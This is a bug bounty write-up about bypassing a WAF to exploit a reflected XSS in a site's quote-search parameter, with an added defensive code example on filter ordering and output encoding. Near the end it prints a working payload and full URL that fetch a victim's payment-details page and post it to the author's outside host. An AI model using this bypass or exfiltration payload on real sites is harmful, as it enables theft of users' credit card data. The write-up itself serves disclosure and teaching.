Bypassing an XSS Filter and Stealing User Payment Data
So here is another writeup about how I bypassed an XSS filter and created a payload to get user credit card data. It was a private program on Bugcrowd; let's just say it was named Redact.
Here is the URL: https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=XSS The parameter searchValue was reflected inside an input field.
So by putting a " I was able to break out of the input field. After that, I tried the most basic payload "><script>alert(1)</script>, but unfortunately my request was blocked by the WAF. So I tried another payload "onmouseover=alert(1) and again my request was blocked by the WAF.
After some playing around, I found out that anything between <> was being removed, so if I type something like this: "o<x>nmouseover=alert<x>(1)//
<x> will be removed, leaving only "onmouseover=alert(1)//, and finally I was able to pop up an XSS.
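The bypass above works because the filter inspects the value before the application strips the <...> fragments, so the filter never sees the string that is actually rendered. The following added example (not code from the original post or from the target application) models that ordering and a corrected one; the WAF rule, the function names and the sample value Q-1001 are assumptions.

```javascript
// Added example: models the ordering flaw described above.
// The WAF rule and the stripping step are assumptions reconstructed from the
// behaviour the writeup observed, not the target's real implementation.

// Constructed stand-in for the WAF: blocks script tags and inline event handlers.
const WAF_RULE = /<script|\bon[a-z]+\s*=/i;
const wafBlocks = (value) => WAF_RULE.test(value);

// Application step observed in the writeup: anything between < and > is removed.
const stripTags = (value) => value.replace(/<[^>]*>/g, "");

// Vulnerable order: inspect the raw value, transform it afterwards, then
// reflect it into the attribute without encoding.
function renderVulnerable(searchValue) {
  if (wafBlocks(searchValue)) return null; // request rejected
  return `<input name="searchValue" value="${stripTags(searchValue)}">`;
}

// Output encoding for a quoted HTML attribute value.
const encodeAttr = (value) =>
  value.replace(/[&<>"']/g, (c) => `&#${c.charCodeAt(0)};`);

// Strip until the value stops changing, so the filter always inspects exactly
// the string that will be rendered, even if the stripping rule changes later.
function canonicalize(value) {
  let prev;
  do { prev = value; value = stripTags(value); } while (value !== prev);
  return value;
}

// Hardened order: canonicalize first, filter the canonical form, and encode
// on output regardless of what the filter decided.
function renderHardened(searchValue) {
  const canonical = canonicalize(searchValue);
  if (wafBlocks(canonical)) return null;
  return `<input name="searchValue" value="${encodeAttr(canonical)}">`;
}

// Sample inputs: the alert(1) test strings from the writeup.
const plain = '"onmouseover=alert(1)//';
const split = '"o<x>nmouseover=alert<x>(1)//';

console.log("WAF blocks plain:", wafBlocks(plain));
console.log("WAF blocks split:", wafBlocks(split));
console.log("vulnerable render:", renderVulnerable(split));
console.log("hardened render:", renderHardened(split));
console.log("hardened benign:", renderHardened('Q-1001 "draft"'));
```

The output encoding is the control that matters: even with no filter in front, an encoded double quote cannot close the value attribute.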
Now there was a page which allows the user to view their payment data, https://www.redact.com/us/en/smbpro/my-account/payment-details, so I thought it would be a good idea to include in my report how I can get users' credit card data with this XSS.
So the payload for stealing user credit card data was this: "o<x>nmouseover=$.get<x>('https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//
As the page was using jQuery, I requested the whole payment data page with $.get() and posted the page content to my server with $.post(), so now with this payload, I was able to get users' payment data:
https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue="o<x>nmouseover=$.get<x>('https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//

But unfortunately, my report was marked as a duplicate.

Thank You for Reading.
